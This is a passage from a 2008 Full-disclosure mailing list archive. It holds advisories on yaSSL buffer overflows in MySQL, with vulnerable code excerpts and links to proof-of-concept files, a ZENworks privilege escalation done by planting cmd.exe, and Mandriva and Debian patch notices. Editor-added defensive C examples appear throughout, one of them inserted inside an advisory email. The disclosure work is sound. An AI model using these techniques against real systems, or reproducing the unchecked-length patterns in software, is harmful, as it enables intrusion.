          byte first = input[AUTO];
          if (first)  // sslv2 type
              input.read(len, SUITE_LEN); // skip
          else {
              input.read(&ch.cipher_suites_[j], SUITE_LEN);
              j += SUITE_LEN;
          }
      }
      ch.suite_len_ = j;

      if (ch.id_len_)
          input.read(ch.session_id_, ch.id_len_);

      if (randomLen < RAN_LEN)
          memset(ch.random_, 0, RAN_LEN - randomLen);
      input.read(&ch.random_[RAN_LEN - randomLen], randomLen);
  ...

------------------------------------------------
B] buffer-overflow in "input_buffer& operator>>"
------------------------------------------------

Another buffer-overflow is located in the function used for handling
the normal Hello packet but in this case it doesn't seem possible (or
easily possible) to exploit this vulnerability for executing code.

From yassl_imp.cpp:

  input_buffer& operator>>(input_buffer& input, ClientHello& hello)
  ...
      hello.id_len_ = input[AUTO];
      if (hello.id_len_) input.read(hello.session_id_, ID_LEN);

      // Suites
      byte tmp[2];
      tmp[0] = input[AUTO];
      tmp[1] = input[AUTO];
      ato16(tmp, hello.suite_len_);

      input.read(hello.cipher_suites_, hello.suite_len_);
  ...

-----------------------------------------------------
C] invalid memory access in HASHwithTransform::Update
-----------------------------------------------------

The usage of a too big size value in the Hello packet leads to a crash
of the library through the reading of data outside the memory
containing the incoming packet.

From hash.cpp:

  void HASHwithTransform::Update(const byte* data, word32 len)
  {
      // do block size increments
      word32 blockSz = getBlockSize();
      byte*  local   = reinterpret_cast<byte*>(buffer_);

      while (len) {
          word32 add = min(len, blockSz - buffLen_);
          memcpy(&local[buffLen_], data, add);
  ...

#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/yasslick.zip

#######################################################################

======
4) Fix
======

A mail has been sent to the developers yesterday during my tests only
to inform them of the vulnerabilities.

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From aluigi at autistici.org Fri Jan 4 17:54:45 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Fri, 4 Jan 2008 18:54:45 +0100
Subject: [Full-disclosure] Pre-auth buffer-overflow in mySQL through yaSSL
Message-ID: <20080104185445.67a4e40a.aluigi@autistici.org>

The following is a proof-of-concept for testing the buffer-overflow
which affects yaSSL <= 1.7.5 on mySQL servers, any version, including
the latest 6.0.3:

http://aluigi.org/poc/mysqlo.zip

The vulnerability is exploitable before authentication so the only
requirements for testing it are the usage of SSL on the server and
naturally having an IP address with access to the database.
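The three fields named in bugs A and B (session id, cipher suites, random) each have a fixed capacity, so the defensive fix is to check every length taken from the packet against that capacity, and against the bytes actually received, before any copy. What follows is an added example by the editor, not yaSSL code and not Luigi Auriemma's proof-of-concept: the sizes ID_LEN, MAX_SUITE_SZ and RAN_LEN are those quoted above from yassl_imp.hpp, while the wire framing (three 16-bit lengths in SSLv2 order, then the payloads), the cursor type and the function names are constructed for the illustration.

```c
/* Bounds-checked ClientHello length handling.  Added example, not yaSSL code:
 * field sizes match the header quoted in the advisory; the wire framing and
 * the type and function names are constructed for this illustration. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define ID_LEN        32   /* session_id_ capacity */
#define MAX_SUITE_SZ  64   /* cipher_suites_ capacity */
#define RAN_LEN       32   /* random_ capacity */
#define SUITE_LEN      2   /* one SSLv3 cipher suite */
#define V2_SPEC_LEN    3   /* one SSLv2 cipher spec: kind byte + 2-byte suite */

typedef struct {
    uint16_t suite_len;                 /* bytes actually stored in cipher_suites */
    uint8_t  cipher_suites[MAX_SUITE_SZ];
    uint8_t  id_len;
    uint8_t  session_id[ID_LEN];
    uint8_t  random[RAN_LEN];
} client_hello_t;

/* Cursor over the received packet: every read is checked against what is left. */
typedef struct { const uint8_t *p; size_t left; } cursor_t;

static int take(cursor_t *c, uint8_t *dst, size_t n)
{
    if (n > c->left) return -1;         /* would read past the end of the packet */
    memcpy(dst, c->p, n); c->p += n; c->left -= n;
    return 0;
}

static int take_u16(cursor_t *c, uint16_t *v)
{
    uint8_t b[2];
    if (take(c, b, 2) != 0) return -1;
    *v = (uint16_t)((b[0] << 8) | b[1]);
    return 0;
}

/* Old-style hello body (constructed framing in SSLv2 order): u16 spec_len,
 * u16 id_len, u16 random_len, then cipher specs, session id and random.
 * Returns 0 on success, -1 if the packet is shorter than it claims, -2 if a
 * declared length exceeds the fixed-size field it would be copied into. */
int parse_old_client_hello(const uint8_t *in, size_t in_len, client_hello_t *ch)
{
    cursor_t c = { in, in_len };
    uint16_t spec_len, id_len, random_len, i, j = 0;
    memset(ch, 0, sizeof *ch);
    if (take_u16(&c, &spec_len) || take_u16(&c, &id_len) || take_u16(&c, &random_len))
        return -1;
    /* Check each declared length against its destination before any copy. */
    if (spec_len % V2_SPEC_LEN != 0) return -2;
    if (id_len > ID_LEN || random_len == 0 || random_len > RAN_LEN) return -2;
    for (i = 0; i < spec_len; i += V2_SPEC_LEN) {
        uint8_t kind, skip[SUITE_LEN];
        if (take(&c, &kind, 1)) return -1;
        if (kind) {                                   /* SSLv2-only spec: skip it */
            if (take(&c, skip, SUITE_LEN)) return -1;
        } else {
            if (j + SUITE_LEN > MAX_SUITE_SZ) return -2;  /* the check bug A lacks */
            if (take(&c, &ch->cipher_suites[j], SUITE_LEN)) return -1;
            j += SUITE_LEN;
        }
    }
    ch->suite_len = j; ch->id_len = (uint8_t)id_len;
    if (take(&c, ch->session_id, id_len)) return -1;
    /* A short random is left-padded with zeros, as in the advisory's excerpt. */
    if (take(&c, &ch->random[RAN_LEN - random_len], random_len)) return -1;
    return 0;
}

/* SSLv3-style fields from bug B: u8 id_len, session id, u16 suite_len, suites.
 * Copies exactly id_len bytes (not ID_LEN) and bounds suite_len by MAX_SUITE_SZ. */
int parse_client_hello_suites(const uint8_t *in, size_t in_len, client_hello_t *ch)
{
    cursor_t c = { in, in_len };
    uint16_t suite_len;
    memset(ch, 0, sizeof *ch);
    if (take(&c, &ch->id_len, 1)) return -1;
    if (ch->id_len > ID_LEN) return -2;
    if (take(&c, ch->session_id, ch->id_len)) return -1;
    if (take_u16(&c, &suite_len)) return -1;
    if (suite_len > MAX_SUITE_SZ || suite_len % SUITE_LEN != 0) return -2;
    if (take(&c, ch->cipher_suites, suite_len)) return -1;
    ch->suite_len = suite_len;
    return 0;
}

/* Constructed sample packet (not captured traffic): one SSLv2-only spec that is
 * skipped, one SSLv3 suite that is stored, a 4-byte session id, a 16-byte random. */
int example_old_hello_ok(void)
{
    static const uint8_t pkt[] = {
        0x00, 0x06, 0x00, 0x04, 0x00, 0x10,   /* spec_len 6, id_len 4, random_len 16 */
        0x01, 0x00, 0x80, 0x00, 0x00, 0x2f,   /* specs: first skipped, then 0x002f */
        0xaa, 0xbb, 0xcc, 0xdd,               /* session id */
        1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16 };
    client_hello_t ch;
    if (parse_old_client_hello(pkt, sizeof pkt, &ch) != 0) return 0;
    return ch.suite_len == 2 && ch.cipher_suites[1] == 0x2f && ch.id_len == 4
        && ch.random[0] == 0 && ch.random[16] == 1 && ch.random[31] == 16;
}
```

parse_old_client_hello() returns -2 for a length that would overflow its field and -1 for a packet shorter than its own lengths claim, in both cases before touching the destination; parse_client_hello_suites() makes the same two checks on the SSLv3-style fields from bug B, reading id_len bytes rather than a fixed ID_LEN.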
By default mySQL uses yaSSL (1.6.0) for avoiding licence conflicts,
anyway if the test server has been compiled with specific OpenSSL
support it is NOT vulnerable.

---
Luigi Auriemma
http://aluigi.org

From fd at gomor.org Fri Jan 4 18:12:55 2008
From: fd at gomor.org (GomoR)
Date: Fri, 4 Jan 2008 19:12:55 +0100
Subject: [Full-disclosure] SinFP fingerprinting tool online demo
In-Reply-To: <20080104185332.e8d46100.aluigi@autistici.org>
References: <20080104185332.e8d46100.aluigi@autistici.org>
Message-ID: <20080104181255.GA7751@nile.enslaved.lan>

Hello list,

for this new year, I put online a demonstration form for SinFP.

SinFP is an OS fingerprinting tool, which features:
- active AND passive fingerprinting
- works over IPv4 AND IPv6
- uses maximum 3 packets, all standards, targeted to one open TCP port

The demo works only in IPv4 active mode.

Feel free to test this program online, and of course, to install it on
your computer ;)

Right now, SinFP is included in BackTrack Linux distro.

Here is the link: http://www.gomor.org/cgi-bin/sinfp.pl
And the direct link for the demo: http://www.gomor.org/cgi-bin/sinfp-demo.pl

Best regards,

--
   ^  ___  ___             http://www.GomoR.org/  <-+
   | / __ |__/                Research Engineer    |
   | \__/ |  \     ---[ zsh$ alias psed='perl -pe ' ]---  |
   +--> Net::Frame <=> http://search.cpan.org/~gomor/ <---+

From secreview at hushmail.com Fri Jan 4 21:27:51 2008
From: secreview at hushmail.com (secreview)
Date: Fri, 4 Jan 2008 13:27:51 -0800 (PST)
Subject: [Full-disclosure] [Professional IT Security Providers - Exposed] Syrex ( B )
Message-ID: <1199482071875.3872ee95-cb2d-4d6c-8c4d-8b1aecc9f7b5@google.com>

Syrex, located at http://www.syrex.com, is a quality Professional IT Security Services Provider that offers Risk Assessments, Risk Mitigation, Security Management, Security Training and Incident Response as well as advanced networking services.
We found Syrex because they came to us and requested that we perform a review, so here are the results.

Looking at the Syrex website was refreshing in comparison to some of the other websites that we've reviewed. Not only was theirs written clearly, but the services were well defined and the content was complete. It is also clear that Syrex is ready to service a wide range of companies based on the structure of their service offerings. For example, under the Risk Assessment offering they have a specific "Snapshot offering" to help meet the requirements of smaller companies that can't afford a more intense service.

Syrex is not your average Professional IT Security Services Provider in that they do not offer Penetration Testing or ethical hacking type services. They also do not offer Web Application Security Assessments or source code reviews (at least not yet). Instead, Syrex helps their customers by performing complete or partial OSSTMM based security audits. The results of those audits enable Syrex to enhance the overall security of their customers' IT infrastructures by exposing weaknesses in policies, procedures, technologies, etc. and providing remediation services. While these auditing services are not as technically deep as penetration testing services, or web application security assessment services, they do help to raise the proverbial security bar.

When speaking with the founder of Syrex, we learned that they do in fact have talent. The founder himself has a deep understanding of Intrusion Detection Systems ("IDS") and Intrusion Prevention Systems ("IPS"), Security Information Management Systems ("SIMS"), network and routing protocols, as well as key Cisco technologies like the ASA, Clean Access, ACS, MARS, and CSM. In conjunction with this, he also has experience as a programmer and understands quite a bit about malware, viruses, and other malicious technologies.
This is more than we can say for a lot of the other companies that we've interviewed.

Another thing that we were impressed with during our telephone interview was the amount of effort that Syrex put into being honest and ethical. On multiple occasions they pointed out limitations in their service capabilities, and at no point did they try to flaunt anything that they were not certain about. This is the second company that we've interviewed that did not make an effort to sound like they are the best. Instead, they talk the talk and walk the walk.

In conjunction with the telephone interview and website review, we were given sample reports and materials. When reviewing the reports it became immediately clear that Syrex was focused on providing their customers with high quality services that were in fact human driven. The reports were very obviously not the product of automated tools, but instead were the product of human talent. Again, this is more than we can say for a lot of the companies that we review. Most companies these days seem to rely heavily on automation and have little to no real human talent.

All in all we would recommend using Syrex if you are looking to increase your levels of security. They will help you define methods for properly managing and maintaining your network, people and information, all the while being honest and ethical. We almost feel bad giving Syrex a B instead of an A, but they are missing research and development capabilities, as well as advanced service delivery capabilities. Other than that, great company! Keep up the good work Syrex!

--
Posted By secreview to Professional IT Security Providers - Exposed at 1/04/2008 01:24:00 PM
From labs-no-reply at idefense.com Fri Jan 4 21:42:46 2008
From: labs-no-reply at idefense.com (iDefense Labs)
Date: Fri, 04 Jan 2008 16:42:46 -0500
Subject: [Full-disclosure] iDefense Security Advisory 12.24.07: Novell ZENworks Endpoint Security Management Local Privilege Escalation Vulnerability
Message-ID: <477EA856.1020602@idefense.com>

iDefense Security Advisory 12.24.07
http://labs.idefense.com/intelligence/vulnerabilities/
Dec 24, 2007

I. BACKGROUND

Novell ZENworks Endpoint Security Management (ESM) Security Client
provides centrally managed, policy based firewall protection for
clients. It is designed to be installed on all workstations within the
enterprise. More information is available on the vendor's site at the
following URL.

http://www.novell.com/products/zenworks/endpointsecuritymanagement/

II. DESCRIPTION

Local exploitation of a privilege escalation vulnerability in Novell
ZENworks Endpoint Security Management allows attackers to execute
arbitrary code with SYSTEM privileges.

When the ZENworks ESM Security Client is installed on a workstation,
the STEngine service is set to run under the local SYSTEM account. This
service is implemented within the following executable.

  File Name: STEngine.exe (1,847,296 bytes)
  Version:   3.5.0.20
  MD5:       B5402A1EC8D04130304EBA89AF843916

The service provides functionality for any user to generate a
diagnostic report in order to aid in product troubleshooting. During
report generation, STEngine attempts to execute various scripts by
spawning command shells to gather system information. These scripts
are dynamically generated in a directory which all users may write to.
STEngine will also attempt to locate a command shell in this directory
and execute it if it is found. If a malicious local user places a
binary named "cmd.exe" in this directory, STEngine will execute it
with SYSTEM level privileges.

III. ANALYSIS

Exploitation allows unprivileged local users to take complete control
of the affected system. Exploitation is trivial and does not require
any special tools or coding ability.

If an attacker desires an interactive command prompt, a small wrapper
application will be required in order to ensure that the command
window is visible after execution.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in
STEngine.exe version 3.5.0.20 as included with Novell Inc's ZENworks
Endpoint Security Management 3.5. Other versions may also be affected.

V. WORKAROUND

iDefense is unaware of any effective workaround for this issue.

VI. VENDOR RESPONSE

Novell has addressed this vulnerability by releasing version 3.5.0.82
of Endpoint Security Management. To download this new version, visit
the following URL.

http://download.novell.com/Download?buildid=5Y6xbs-OKLE~

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2007-5665 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

09/24/2007  Initial vendor notification
09/25/2007  Initial vendor response
12/24/2007  Coordinated public disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Stephen Fewer of Harmony
Security (www.harmonysecurity.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2008 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice at idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS
condition. There are no warranties with regard to this information.
Neither the author nor the publisher accepts any liability for any
direct, indirect, or consequential loss or damage arising from use of,
or reliance on, this information.

From security at mandriva.com Fri Jan 4 23:42:45 2008
From: security at mandriva.com (security at mandriva.com)
Date: Fri, 04 Jan 2008 16:42:45 -0700
Subject: [Full-disclosure] [ MDVSA-2008:002 ] - Updated squid package fixes remote denial of service
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:002
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : squid
 Date    : January 4, 2008
 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0,
           Multi Network Firewall 2.0
 _______________________________________________________________________

 Problem Description:

 The cache update reply processing functionality in Squid 2.x before
 2.6.STABLE17, and Squid 3.0, allows remote attackers to cause a denial
 of service (crash) via unknown vectors related to HTTP headers.

 The updated package fixes this issue.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6239
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2007.0:
 96faafb7a9e07b278a0aafa84bf926ae  2007.0/i586/squid-2.6.STABLE1-4.4mdv2007.0.i586.rpm
 03fad047effae58ca2489e80aa1bfa5b  2007.0/i586/squid-cachemgr-2.6.STABLE1-4.4mdv2007.0.i586.rpm
 37dfa22f24df058851acc5c3c1b5879d  2007.0/SRPMS/squid-2.6.STABLE1-4.4mdv2007.0.src.rpm

 Mandriva Linux 2007.0/X86_64:
 c2ed1ce138a117d92a9d1258e19853a4  2007.0/x86_64/squid-2.6.STABLE1-4.4mdv2007.0.x86_64.rpm
 8b1db434ee0e509aa71d7b1c81f62665  2007.0/x86_64/squid-cachemgr-2.6.STABLE1-4.4mdv2007.0.x86_64.rpm
 37dfa22f24df058851acc5c3c1b5879d  2007.0/SRPMS/squid-2.6.STABLE1-4.4mdv2007.0.src.rpm

 Mandriva Linux 2007.1:
 4e5314934a52d574cfab66fab288fec1  2007.1/i586/squid-2.6.STABLE7-2.1mdv2007.1.i586.rpm
 ea5fff3e07bb15bca7a2c3b3fd1dce43  2007.1/i586/squid-cachemgr-2.6.STABLE7-2.1mdv2007.1.i586.rpm
 8ae95395bd9b0bd3888561ce359048db  2007.1/SRPMS/squid-2.6.STABLE7-2.1mdv2007.1.src.rpm

 Mandriva Linux 2007.1/X86_64:
 c4b1a7b86c812f272601c76c757a456e  2007.1/x86_64/squid-2.6.STABLE7-2.1mdv2007.1.x86_64.rpm
 48bd862e07da9f1aacbf8f4e30ebc734  2007.1/x86_64/squid-cachemgr-2.6.STABLE7-2.1mdv2007.1.x86_64.rpm
 8ae95395bd9b0bd3888561ce359048db  2007.1/SRPMS/squid-2.6.STABLE7-2.1mdv2007.1.src.rpm

 Mandriva Linux 2008.0:
 471283e5ec222b4558804201ed528580  2008.0/i586/squid-2.6.STABLE16-1.2mdv2008.0.i586.rpm
 aae1cede196ab3ee8ce872a4f9339197  2008.0/i586/squid-cachemgr-2.6.STABLE16-1.2mdv2008.0.i586.rpm
 3b7ac01f28af138e6a4a911ea13c3014  2008.0/SRPMS/squid-2.6.STABLE16-1.2mdv2008.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 ee831d24d0027f9e30d329ba19481572  2008.0/x86_64/squid-2.6.STABLE16-1.2mdv2008.0.x86_64.rpm
 4d788055f21fd55b228881b66d4e351e  2008.0/x86_64/squid-cachemgr-2.6.STABLE16-1.2mdv2008.0.x86_64.rpm
 3b7ac01f28af138e6a4a911ea13c3014  2008.0/SRPMS/squid-2.6.STABLE16-1.2mdv2008.0.src.rpm

 Corporate 3.0:
 b80be38521a9c761ddeb3fac585a5bef  corporate/3.0/i586/squid-2.5.STABLE9-1.8.C30mdk.i586.rpm
 068c0327621ff22367dd979aa9f7ecee  corporate/3.0/SRPMS/squid-2.5.STABLE9-1.8.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 2c0eaf65b0c65bb56793bce55d2ac0fc  corporate/3.0/x86_64/squid-2.5.STABLE9-1.8.C30mdk.x86_64.rpm
 068c0327621ff22367dd979aa9f7ecee  corporate/3.0/SRPMS/squid-2.5.STABLE9-1.8.C30mdk.src.rpm

 Corporate 4.0:
 69d5364d1187f459934c86e311bf6d96  corporate/4.0/i586/squid-2.6.STABLE1-4.4.20060mlcs4.i586.rpm
 9cab80bad8eac5d17af87f8411185529  corporate/4.0/i586/squid-cachemgr-2.6.STABLE1-4.4.20060mlcs4.i586.rpm
 33c75a040e930c85e7668b160216558a  corporate/4.0/SRPMS/squid-2.6.STABLE1-4.4.20060mlcs4.src.rpm

 Corporate 4.0/X86_64:
 37a81cbfac6f8937fd74e4b672e04019  corporate/4.0/x86_64/squid-2.6.STABLE1-4.4.20060mlcs4.x86_64.rpm
 df0f15a253003d6b2c234e4a5ccfbff1  corporate/4.0/x86_64/squid-cachemgr-2.6.STABLE1-4.4.20060mlcs4.x86_64.rpm
 33c75a040e930c85e7668b160216558a  corporate/4.0/SRPMS/squid-2.6.STABLE1-4.4.20060mlcs4.src.rpm

 Multi Network Firewall 2.0:
 0d291e6348ec79f86213230619ce7cfd  mnf/2.0/i586/squid-2.5.STABLE9-1.8.M20mdk.i586.rpm
 2192fc9b2b9e1e000e144abf8e054860  mnf/2.0/SRPMS/squid-2.5.STABLE9-1.8.M20mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security.
 You can obtain the GPG public key of the Mandriva Security Team by
 executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (GNU/Linux)

iEYEARECAAYFAkd+mOMACgkQmqjQ0CJFipjgwACeLzJfKZn1RHqoqzVsxczyJcHO
v9kAn1gapJ/F6MciY5VtzOaHumprqySG
=Qb45
-----END PGP SIGNATURE-----

From sys at lfod.info Sat Jan 5 00:12:03 2008
From: sys at lfod.info (sys at lfod.info)
Date: Sat, 05 Jan 2008 01:12:03 +0100
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To: <452214.1315441199301228241.JavaMail.servlet@perfora>
References: <452214.1315441199301228241.JavaMail.servlet@perfora>
Message-ID: <477ECB53.5070304@lfod.info>

Once a so-called security expert was pen-testing my VMS shop. We were
having a nice chat while his eval version of GFI LANguard finished the
scan, and got to talk about VMS. He didn't believe in the robust
security of VMS and told me to do a search for vms on bugtraq, and see
how many results came up.

So I did, and was horrified when I saw thousands of results... Until I
noticed that the matched string in all the (barring perhaps 1 in 10000)
results was "VMs"; not "VMS" or "vms".

(This was some years ago. The bugtraq search function's improved now.)

Randal T. Rioux wrote:
>> Valdis.Kletnieks at vt.edu said:
>
>> Bonus points for knowing that VMS was mostly written in Bliss/32 or some
>> such, and VM and MVS were a mixture of assembler and (later on) PL/S.
>> No C knowledge needed for those critters...
>
> OpenVMS is less than 40% Blissful... though I'm not familiar with the
> original source (wasn't it written on stone tablets?).
> About 50% is C, with a healthy mix of obsoletes making the difference.
> How something so elegant could be spawned from such chaos is beyond me.
>
> Mostly, the VMS basic OS utilities are Bliss-based (think: GNU).
>
> I really wish HP would open OpenVMS before they kill it.
>
> Security relevance: UNHACKABLE!
>
> Randy
>

From dudevanwinkle at gmail.com Sat Jan 5 02:08:36 2008
From: dudevanwinkle at gmail.com (Dude VanWinkle)
Date: Fri, 4 Jan 2008 21:08:36 -0500
Subject: [Full-disclosure] Was secreview crap - now OpenVMS!!
In-Reply-To:
References: <452214.1315441199301228241.JavaMail.servlet@perfora> <25233.1199302350@turing-police.cc.vt.edu>
Message-ID:

On Jan 2, 2008 2:48 PM, reepex wrote:
> sure signs of someone washed up as evident by your
> non-productiveness in the last few years ( and no - spamming mailing lists
> does not count )

Gee, I would think that setting up an emergency alert system (pager,
Phone, CCtv, SMTP, etc) for VT.edu would be considered "productive" by
anyone's book..

Not all infosec is debuggers and fuzzers, sometimes you have to
"create" secure systems as part of a job.

-JP

From worriedsecurity at googlemail.com Sat Jan 5 04:00:05 2008
From: worriedsecurity at googlemail.com (worried security)
Date: Sat, 5 Jan 2008 04:00:05 +0000
Subject: [Full-disclosure] Uber Lamer Ass of the Year. Vote!
In-Reply-To: <90865ed50801030754w14f327fcq7fad47902fac5821@mail.gmail.com>
References: <5c9b0ff50712221426u3e2d6b39y6ba8696e6491af27@mail.gmail.com> <90865ed50712232059s27a419b3j33ae8857bcfa70e0@mail.gmail.com> <67ea64530801021302s4b004496k9667bf86708fde45@mail.gmail.com> <90865ed50801030754w14f327fcq7fad47902fac5821@mail.gmail.com>
Message-ID: <67ea64530801042000g20d8d5a5j2bdd3c24ae45132e@mail.gmail.com>

On Jan 3, 2008 3:54 PM, damncon wrote:
> btw im already signed in lulz
>

How clever are you---master of disguise. I didn't know the gmail
addresses that are garbled and don't make up anyone's real name or
organisation are the feds.
I expected them all to be on their official addresses for their
government departments if they signed up, how naive of me to think that
I thought we were fed free on n3td3v group.

I should assume in future that one random garbled gmail address can
feed a whole security operations center of staff, so 4000+ gmail
addresses can feed a whole universe of world governments and
organisations. Thanks for the tip off.

Valdis can you confirm this...

From Valdis.Kletnieks at vt.edu Sat Jan 5 05:35:11 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Sat, 05 Jan 2008 00:35:11 -0500
Subject: [Full-disclosure] Uber Lamer Ass of the Year. Vote!
In-Reply-To: Your message of "Sat, 05 Jan 2008 04:00:05 GMT." <67ea64530801042000g20d8d5a5j2bdd3c24ae45132e@mail.gmail.com>
References: <5c9b0ff50712221426u3e2d6b39y6ba8696e6491af27@mail.gmail.com> <90865ed50712232059s27a419b3j33ae8857bcfa70e0@mail.gmail.com> <67ea64530801021302s4b004496k9667bf86708fde45@mail.gmail.com> <90865ed50801030754w14f327fcq7fad47902fac5821@mail.gmail.com> <67ea64530801042000g20d8d5a5j2bdd3c24ae45132e@mail.gmail.com>
Message-ID: <14446.1199511311@turing-police.cc.vt.edu>

On Sat, 05 Jan 2008 04:00:05 GMT, worried security said:
> I expected them all to be on their official addresses for their
> government departments if they signed up, how naive of me to think
> that I thought we were fed free on n3td3v group.

> Valdis can you confirm this...

Yes, I can confirm that you're naive.
Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080105/064b1b92/attachment.bin From skx at debian.org Sat Jan 5 15:09:31 2008 From: skx at debian.org (Steve Kemp) Date: Sat, 5 Jan 2008 15:09:31 +0000 Subject: [Full-disclosure] [SECURITY] [DSA 1449-1] New loop-aes-utils packages fix programming error Message-ID: <20080105150931.GA19854@steve.org.uk> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------ Debian Security Advisory DSA-1449-1 security at debian.org http://www.debian.org/security/ Steve Kemp January 05, 2008 http://www.debian.org/security/faq - ------------------------------------------------------------------------ Package : loop-aes-utils Vulnerability : programming error Problem type : local Debian-specific: no CVE Id(s) : CVE-2007-5191 It was discovered that loop-aes-utils, tools for mounting and manipulating filesystems, didn't drop privileged users and groups in the correct order in the mount and umount commands. This could potentially allow a local user to gain additional privileges. For the stable distribution (etch), this problem has been fixed in version 2.12r-15+etch1. For the old stable distribution (sarge), this problem has been fixed in version 2.12p-4sarge2. We recommend that you upgrade your loop-aes-utils package. Upgrade instructions - -------------------- wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given below: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. 
Debian GNU/Linux 3.1 alias sarge
--------------------------------

Source archives and per-architecture packages, with Size/MD5 checksums (list omitted).

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives and per-architecture packages (loop-aes-utils .deb and mount-aes-udeb .udeb), with Size/MD5 checksums (list omitted).

These files will probably be moved into the stable distribution on its next update.
---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFHf51xwM/Gs81MDZ0RAjqiAJ4tp4GU4o4xUEs1IVlt2h82CSnoCQCgn3IJ
+fQurSEpAkrAOu7UiYpmoWM=
=dJ1n
-----END PGP SIGNATURE-----

From skx at debian.org Sat Jan 5 15:10:06 2008
From: skx at debian.org (Steve Kemp)
Date: Sat, 5 Jan 2008 15:10:06 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1450-1] New util-linux packages fix programming error
Message-ID: <20080105151006.GB19854@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

------------------------------------------------------------------------
Debian Security Advisory DSA-1450-1                security at debian.org
http://www.debian.org/security/                             Steve Kemp
January 05, 2008                      http://www.debian.org/security/faq
------------------------------------------------------------------------

Package        : util-linux
Vulnerability  : programming error
Problem type   : local
Debian-specific: no
CVE Id(s)      : CVE-2007-5191
Debian Bug     : XXX

It was discovered that util-linux, miscellaneous system utilities, didn't drop privileged users and groups in the correct order in the mount and umount commands. This could potentially allow a local user to gain additional privileges.

For the stable distribution (etch), this problem has been fixed in version 2.12r-19etch1.

For the old stable distribution (sarge), this problem has been fixed in version 2.12p-4sarge2.

We recommend that you upgrade your util-linux package.

Upgrade instructions
--------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the footer to the proper configuration.

Debian GNU/Linux 3.1 alias sarge
--------------------------------

Source archives, architecture independent packages (util-linux-locales) and per-architecture packages (util-linux, mount, bsdutils, fdisk-udeb), with Size/MD5 checksums (list omitted).

Debian GNU/Linux 4.0 alias etch
-------------------------------

Source archives, architecture independent packages (util-linux-locales) and per-architecture packages (util-linux, mount, bsdutils, fdisk-udeb, cfdisk-udeb), with Size/MD5 checksums (list omitted).

These files will probably be moved into the stable distribution on its next update.
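The ordering bug that DSA-1449 and DSA-1450 describe (the uid given up before the gid, so the gid drop fails once root is gone and an unchecked return value hides it) is easiest to see next to the correct sequence. The C program below is an added example, not code from util-linux, loop-aes-utils or Debian; the target ids 65534 and the helper names are constructed for illustration.

```c
/*
 * privdrop.c -- drop root in the safe order and verify it actually happened.
 * Added example, not code from util-linux or loop-aes-utils.  It models the
 * class of bug in CVE-2007-5191 (uid and gid dropped in the wrong order);
 * the target ids and helper names are constructed for illustration.
 */
#define _GNU_SOURCE
#include <grp.h>
#include <stdio.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Return 0 when real and effective uid/gid both equal the requested ids. */
int verify_ids(uid_t uid, gid_t gid)
{
    if (getuid() != uid || geteuid() != uid)
        return -1;
    if (getgid() != gid || getegid() != gid)
        return -1;
    return 0;
}

/*
 * Wrong order: uid first, gid second.  Once setuid() has given up root,
 * setgid() to a gid that is neither the real nor the saved gid fails with
 * EPERM.  Code that ignores that return value keeps running with the old,
 * privileged gid while looking as if it had dropped privileges.
 */
int drop_privileges_wrong_order(uid_t uid, gid_t gid)
{
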